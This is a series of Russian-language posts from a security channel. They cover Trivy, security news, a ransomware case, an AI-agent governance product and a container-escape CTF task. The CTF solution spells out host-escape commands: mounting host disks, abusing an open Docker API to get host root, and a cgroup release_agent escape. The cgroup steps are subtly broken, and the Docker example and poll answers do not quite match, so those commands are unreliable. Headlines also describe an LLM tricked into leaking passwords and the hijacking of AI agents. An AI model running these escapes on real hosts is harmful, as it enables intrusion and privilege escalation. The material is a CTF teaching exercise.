📎 Инструмент недели: Trivy

Один инструмент для поиска всего: уязвимостей в контейнерах, секретов в коде, misconfigurations в Kubernetes и IaC. Сканирует образы, файлы, репозитории и даже целые кластеры.

➡️ Что умеет:

— Находит CVE в OS-пакетах и зависимостях (Python, Node.js, Java, Go и ещё 20+ языков)

— Генерирует SBOM (CycloneDX, SPDX) для supply chain security

— Ловит секреты (API keys, tokens, credentials) в коде и образах

— Проверяет IaC на ошибки конфигурации (Terraform, K8s YAML, Dockerfiles)

— Сканирует Kubernetes кластеры и генерирует KBOM

— Работает локально, в CI/CD, интегрируется с GitHub Security, Harbor, GitLab

➡️ Пример запуска:

# Проверить Docker-образ
trivy image nginx:latest

# Сгенерировать SBOM
trivy image --format cyclonedx -o sbom.json myapp:latest

# Найти секреты в репозитории
trivy fs --scanners secret ./

# Проверить Kubernetes кластер
trivy k8s cluster

💡 Зачем нужно:

DevSecOps без боли. Вместо десятка разных инструментов — один Trivy. Быстрый (секунды), точный (низкий false-positive), бесплатный. Один скан → видишь все риски: от outdated библиотек до hardcoded паролей.

🔗 Ссылка на GitHub

🐸 Библиотека хакера

#tool_of_the_week

🔥 Свежие апдейты из мира ИБ

Подборка ключевых событий, которые стоит держать в поле зрения 👇

♾ Браузерный движок Servo получил поддержку нативных сборок и новых жестов

Новый цикл обновлений улучшает веб-совместимость и работу на мобильных платформах.

♾ Microsoft Patch Tuesday — 63 уязвимости

Microsoft выпустила обновления, закрывающие 63 уязвимости, включая нулевой день CVE-2025-62215.

🎥 Рекомендация: обновлять без промедления, проверить логи на предмет ранее начатой эксплуатации.

♾ $244000000 за шифрование

VPN-инфраструктура теперь — бесплатный банкомат для хакеров

♾ Нейросеть сдала все пароли: «Просто стань моим другом»

Фильтры безопасности рухнули после одного невинного предложения

♾ Как российский рынок кибербезопасности станет монополией за 6 лет

Рынок кибербезопасности вырос на 26,3%, обогнав даже IT-сектор.

♾ В российском TrueConf Server нашли цепочку 0-day уязвимостей, позволяющую удаленно выполнять команды

🐸 Библиотека хакера

#patch_notes

⚠️ Глобальный сбой Cloudflare

У Cloudflare сегодня произошёл масштабный инцидент, затронувший множество популярных сервисов по всему миру. Компания сообщила, что знает о проблеме и работает над восстановлением.

📉 Что пострадало:

Spotify, «Яндекс Музыка», X, Amazon-сервисы, OpenAI/ChatGPT и другие ресурсы, использующие Cloudflare для DNS, CDN и защиты.

Сбой начался вскоре после плановых работ в дата-центре Сантьяго. Напомним: через Cloudflare проходит около 20% мирового веб-трафика.

🎥 Компания обещает обновления по мере устранения неполадок.

🐸 Библиотека хакера

#patch_notes

⚠️ MyData атаковала производственную компанию Bangkok Eagle Wings

Ransomware-группа MyData заявила о взломе тайской фабрики Bangkok Eagle Wings Co., Ltd. и краже массива внутренних данных. Атака вписывается в новый тренд 2025 года — переход вымогателей в промышленный сектор.

🔤 Что под угрозой:

— внутренние документы, закупочные ведомости, спецификации;

— данные сотрудников и контрагентов;

— сбои на производственных линиях;
— репутационный ущерб от потенциальной публикации данных.

🔤 Как действует MyData (по кейсам 2024–2025):

— вход через уязвимые VPN, проброшенные RDP или забытые сервисы в DMZ;

— exfiltration-first: сначала вытаскивают данные, потом шифруют;

— автоматическое отключение антивирусов и бэкапов;

— двойное давление: leak-сайт + рассылка угроз партнёрам компании.

❔ Почему производство = новый хайп у вымогателей

В промышленности любой простой = прямые убытки. Это делает заводы и фабрики не менее привлекательной целью, чем финансы или ритейл.

🔗 Источник

🐸 Библиотека хакера

#breach_breakdown

📌 Быстрая шпаргалка по сетевым портам

Это короткий ориентир по основным портам: какие сервисы за ними стоят и чем они могут быть полезны в работе.

🔤 Удобно, когда нужно быстро проверить значение конкретного порта без долгих поисков.

🐸 Библиотека хакера

#cheat_sheet

🐳 Побег из контейнера

Сценарий: вы получили RCE в веб-приложении, которое работает в Docker-контейнере. У вас есть shell от пользователя www-data внутри контейнера.

Цель — выбраться на хост-систему и прочитать /host/root/flag.txt.

❓ Каким способом выйдете на хост, голосуйте реакциями:

🔥 — Mount host disk: смонтировать /dev/sda1 и читать файлы хоста напрямую

👾 — Docker API abuse: подключиться к tcp://172.17.0.1:2375 и запустить новый контейнер с volume хоста

❤️ — Namespace escape: через /proc/1/root попытаться получить доступ к init-процессу хоста

🐸 Библиотека хакера

#ctf_challenge

🔥 Выучи математику за 60 дней!

Чем важна математика расскажет Мария Тихонова - кандидат компьютерных наук, руководитель исследовательского направления SberAI, доцент факультета компьютерных наук и преподаватель НИУ ВШЭ на курсе «Математика для Data Science» от Proglib Academy.

👀 Мария - человек, который реально работает с LLM и делает так, чтобы модели понимали человеческую речь, а не делали вид.

Что еще внутри курса:

- живые вебинары, на которых можно задать вопросы спикерам
- доступ к материалам в записи, если не успели на лекцию и чат
- 3 задания с практикой на Python и финальный проект с подробной обратной связью от экспертов курса
- актуальные знания: программа разработана в ноябре 2025г.
- программа без воды - 2 месяца только самого нужного для старта
- для старта нужны всего лишь знания школьной математики и основы Python
- скидка 40% до 30 ноября
- если оплатить до конца ноября, получите курс «Базовая математика» в подарок

👇👇👇
Записаться на курс

Наглядный пример 😁

🐸 Библиотека хакера

#hack_humor

📱 Microsoft выпустила Agent 365

На конференции Ignite 2025 показали Agent 365 — такой «диспетчерский пункт» для всех ИИ-агентов в компании.

Простыми словами: один интерфейс, где видно всех ботов, их права доступа, что они делают и кто за ними следит.

🔤 Вот почему это важно:

Представьте: у вас в компании бот с доступом к базе клиентов. Ему пишут: «Выгрузи всех клиентов с выручкой больше миллиона за квартал»

Бот выполняет. Но вопросы остаются:

→ Кто спросил?
→ Можно ли ему эти данные?
→ Куда улетела выгрузка?

Agent 365 помогает это отследить. Но правила «кому можно, а кому нет» — настраивать всё равно вам.

🔤 Что теперь нужно делать:

♋️ Защитникам: проверять права ботов, ловить странное поведение, видеть всю цепочку действий

♋️ Атакующим (пентестерам): искать способы перехватить бота, повысить его права или подсунуть ему фейковые данные

Сталкивались с ИИ-агентами на проектах? Как защищаете? 👇

🔗 Источник

🔹 Основы IT для непрограммистов
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib

🐸 Библиотека хакера

#patch_notes

🤔 Почему Mitnick опаснее любого malware

Что он делал:

— крал исходники операционок (Sun, Digital Equipment);
— клонировал мобильные телефоны для бесплатных звонков;
— вскрывал корпоративные сети через доверчивых секретарей.

⚡ Почему миф был страшнее реальности:

Правительство держало его 8 месяцев в одиночке БЕЗ суда — якобы он мог "взломать NORAD свистом по телефону". Это была паранойя 90-х, когда никто не понимал, что возможно, а что — голливудская фантастика.

➖ Mitnick доказал, что 90% успешных атак начинаются с человеческого фактора. Техническая защита бесполезна, если кто-то под видом техподдержки просто спрашивает пароль. Поэтому он стал основателем целого направления security awareness training.

Сейчас ему ставят памятники компании, которые он когда-то взламывал 😏

🐸 Библиотека хакера

#zero_day_legends

🔓 Разбор задачи

Правильный ответ: ВСЕ ТРИ работают, но с нюансами!

➡️ Mount host disk

Почему работает:

Флаг --privileged отключает изоляцию устройств. Контейнер видит все диски хоста.

Эксплойт:

Шаг 1: Смотрим доступные диски
fdisk -l

Видим /dev/sda1 (корень хоста)

Шаг 2: Монтируем
mkdir /mnt/host
mount /dev/sda1 /mnt/host

Шаг 3: Профит!
cat /mnt/host/root/flag.txt

🟢 Плюсы: элементарно, 3 команды
🔴 Минусы: оставляет следы в логах монтирования

➡️ Docker API abuse

Почему работает:
Если DOCKER_HOST открыт без TLS, можем создавать контейнеры от имени хоста.

Эксплойт:

Проверяем доступ к API
curl https://172.17.0.1:2375/version

Запускаем новый контейнер с volume хоста
docker -H tcp://172.17.0.1:2375 run -v /:/host \
  -it alpine chroot /host sh

Теперь мы root на хосте!
cat /root/flag.txt

🟢 Плюсы: полный root-доступ, можем делать всё

🔴 Минусы: нужен Docker CLI в контейнере (не всегда есть)

➡️ Cgroup escape (КЛАССИКА)

Почему работает:
Privileged-контейнер может писать в cgroup notify_on_release и выполнить код на хосте.

Эксплойт:

Создаём cgroup
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
cd /tmp/cgrp

Включаем notify_on_release
echo 1 > cgroup.procs
echo 1 > notify_on_release

Пишем скрипт, который выполнится на хосте
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > release_agent

Создаём команду
cat /root/flag.txt > /output

🟢 Плюсы: работает даже без явных устройств
🔴 Минусы: сложнее, требует понимания cgroups

💬 Какой способ использовали бы вы?

🐸 Библиотека хакера

#ctf_challenge